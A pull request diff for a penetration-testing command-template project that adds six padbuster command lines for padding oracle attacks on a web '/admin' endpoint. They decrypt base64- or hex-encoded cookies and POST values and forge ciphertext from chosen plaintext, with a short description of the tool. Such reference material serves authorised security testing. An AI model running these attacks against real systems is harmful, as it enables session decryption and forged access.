### PR TITLE
feat: added commands for padbuster

### DIFF
--- a/src/profi/templates/scripts/padbuster-decrypt-base64-get.yaml
+++ b/src/profi/templates/scripts/padbuster-decrypt-base64-get.yaml
@@ -1,0 +1,9 @@
+---
+metadata:
+  filename: "padbuster-decrypt-base64-get.yaml"
+  tags: ["web", "cracking"]
+  created: "2025-07-10"
+  author: "@Anakles"
+
+content: |
+  padbuster http://$IP:$PORT/admin "<base64value>" 16 -encoding 0 -cookies "user=<base64value>" [-error <canary>]

--- a/src/profi/templates/scripts/padbuster-decrypt-base64-post.yaml
+++ b/src/profi/templates/scripts/padbuster-decrypt-base64-post.yaml
@@ -1,0 +1,9 @@
+---
+metadata:
+  filename: "padbuster-decrypt-base64-post.yaml"
+  tags: ["web", "cracking"]
+  created: "2025-07-10"
+  author: "@Anakles"
+
+content: |
+  padbuster http://$IP:$PORT/admin "<base64value>" 16 -encoding 0 -post <base64value> [-cookies <cookies>] [-error <canary>]

--- a/src/profi/templates/scripts/padbuster-decrypt-hex-get.yaml
+++ b/src/profi/templates/scripts/padbuster-decrypt-hex-get.yaml
@@ -1,0 +1,9 @@
+---
+metadata:
+  filename: "padbuster-decrypt-hex-get.yaml"
+  tags: ["web", "cracking"]
+  created: "2025-07-10"
+  author: "@Anakles"
+
+content: |
+  padbuster http://$IP:$PORT/admin "<hexvalue>" 16 -encoding 1 -cookies "user=<hexvalue>" [-error <canary>]

--- a/src/profi/templates/scripts/padbuster-decrypt-hex-post.yaml
+++ b/src/profi/templates/scripts/padbuster-decrypt-hex-post.yaml
@@ -1,0 +1,9 @@
+---
+metadata:
+  filename: "padbuster-decrypt-hex-post.yaml"
+  tags: ["web", "cracking"]
+  created: "2025-07-10"
+  author: "@Anakles"
+
+content: |
+  padbuster http://$IP:$PORT/admin "<hexvalue>" 16 -encoding 1 -post <hexvalue> [-cookies <cookies>]  [-error <canary>]

--- a/src/profi/templates/scripts/padbuster-encrypt-base64-get.yaml
+++ b/src/profi/templates/scripts/padbuster-encrypt-base64-get.yaml
@@ -1,0 +1,9 @@
+---
+metadata:
+  filename: "padbuster-encrypt-base64-get.yaml"
+  tags: ["web", "cracking"]
+  created: "2025-07-10"
+  author: "@Anakles"
+
+content: |
+  padbuster http://$IP:$PORT/admin "<base64value>" 16 -encoding 0 -cookies "user=<base64value>" -plaintext <plaintext> [-error <canary>]

--- a/src/profi/templates/scripts/padbuster-encrypt-hex-get.yaml
+++ b/src/profi/templates/scripts/padbuster-encrypt-hex-get.yaml
@@ -1,0 +1,9 @@
+---
+metadata:
+  filename: "padbuster-encrypt-hex-get.yaml"
+  tags: ["web", "cracking"]
+  created: "2025-07-10"
+  author: "@Anakles"
+
+content: |
+  padbuster http://$IP:$PORT/admin "<hexvalue>" 16 -encoding 1 -cookies "user=<hexvalue>" -plaintext <plaintext> [-error <canary>]


### PR DESCRIPTION
* padbuster is a tool for padding oracle attacks in HTTP requests
* added commands to attack both hex- and base64 encoded payloads
* GET and POST requests
* added commands to decrypt a secret
* added commands to encrypt a plaintext
* padbuster is available in the Kali repo as `padbuster` (install via `sudo apt installl padbuster`)